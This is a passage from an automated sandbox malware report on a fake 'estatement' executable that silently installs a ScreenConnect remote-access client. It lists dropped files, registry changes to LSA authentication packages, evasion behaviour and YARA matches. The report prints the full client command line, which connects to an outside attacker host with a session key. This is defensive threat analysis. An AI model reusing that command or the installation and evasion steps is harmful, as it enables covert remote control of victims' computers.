                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeMemory allocated: 12C0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeMemory allocated: 2E80000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeMemory allocated: 2CA0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeMemory allocated: 64E0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeMemory allocated: 5BD0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeMemory allocated: 74E0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeMemory allocated: 84E0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeMemory allocated: 1BE0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeMemory allocated: 1E70000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeMemory allocated: 1BE0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeMemory allocated: DE0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeMemory allocated: 1A830000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeMemory allocated: 2D10000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeMemory allocated: 1AF20000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEDBA.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmpJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEAEA.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeAPI coverage: 1.0 %
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exe TID: 7304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe TID: 7776Thread sleep count: 43 > 30Jump to behavior
                                  Source: C:\Windows\System32\svchost.exe TID: 7940Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe TID: 8028Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                                  Source: svchost.exe, 0000000A.00000002.2585096155.000001DEBBA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2587092883.000001DEC1055000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: ScreenConnect.ClientService.exe, 00000008.00000002.2584322286.0000000001176000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Source: 0.2.estatement020134230003.exe.virus.exe.53a0000.5.raw.unpack, NativeLibrary.csReference to suspicious API methods: LoadLibrary(type, assemblyTypeHint)
                                  Source: 0.2.estatement020134230003.exe.virus.exe.2c50000.0.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                                  Source: 0.2.estatement020134230003.exe.virus.exe.5430000.9.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                                  Source: 0.2.estatement020134230003.exe.virus.exe.5430000.9.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                                  Source: 0.2.estatement020134230003.exe.virus.exe.5430000.9.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                                  Source: 0.2.estatement020134230003.exe.virus.exe.5430000.9.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\8d1a70ac1b2b845c\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (8d1a70ac1b2b845c)\screenconnect.clientservice.exe" "?e=access&y=guest&h=learnskillboosts.con-ip.com&p=8041&s=83bddc03-80e5-4274-9bbf-03906dc66e78&k=bgiaaackaabsu0exaagaaaeaaqdh9vkulel1l4hk6ortvbsb%2bthoksnlk7ue9qyl%2f0hx9d6dat7da%2fwwdsnffail7wzkozkfgefuvzh3db2b%2fnsvw1gbyyru0i1tb65qvaga%2flvqinqa%2fmrlktlesdj%2fbbxbwucr3qlzst6j6zv5%2bj3yerzg2t2x3hg00znlokdhzkrituiilcocfsdx8uo3ntl2k0lkupbjewrhekyioqgccrksxo68%2fpjlrw6iaea%2fbdf3oiyw%2ff5lubvyzuv43lm%2b7jgquatswnq0i7edwlbmxc6aagp4xfbg3zw%2flzs6bdlgcd1ktxwqtigjkldweisoga4awx5bvaiccsnm3ygx&c=genral-lm&c=&c=&c=&c=&c=&c=&c="
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1390035254.0000000000522000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Progman
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1390035254.0000000000522000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIE1B2.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Client.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Core.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.Windows.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.ClientService.exeCode function: 8_2_05A7057C CreateNamedPipeW,8_2_05A7057C
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeCode function: 0_2_05612D07 RtlGetVersion,0_2_05612D07
                                  Source: C:\Users\user\Desktop\estatement020134230003.exe.virus.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                                  Source: Yara matchFile source: estatement020134230003.exe.virus.exe, type: SAMPLE
                                  Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.28afa10.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 11.2.ScreenConnect.WindowsClient.exe.2f9fa50.4.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.520000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.estatement020134230003.exe.virus.exe.5690000.11.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.estatement020134230003.exe.virus.exe.5690000.11.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.estatement020134230003.exe.virus.exe.ce63d4.4.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.estatement020134230003.exe.virus.exe.d95db0.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.estatement020134230003.exe.virus.exe.d6c3d4.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.estatement020134230003.exe.virus.exe.cd0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.1363853523.0000000005690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000000.1390035254.0000000000522000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.1392397401.00000000074E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000002.1444417476.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000002.2587568699.0000000002831000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.1326278393.0000000000CE6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: estatement020134230003.exe.virus.exe PID: 7284, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7556, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7788, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 8008, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF2BE9192CA85E951C.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF23619B86A3BB53E3.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF7AC8940F9BF3568C.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF901E3882A4632C12.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF7B9A0F9D3088424B.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF4FF09AA005F92BAC.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Config.Msi\60e8b8.rbs, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Installer\MSIEACA.tmp, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (8d1a70ac1b2b845c)\ScreenConnect.WindowsClient.exe, type: DROPPED
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire Infrastructure1
                                  Valid Accounts
                                  31
                                  Windows Management Instrumentation
                                  1
                                  DLL Side-Loading
                                  1
                                  DLL Side-Loading
                                  11
                                  Disable or Modify Tools
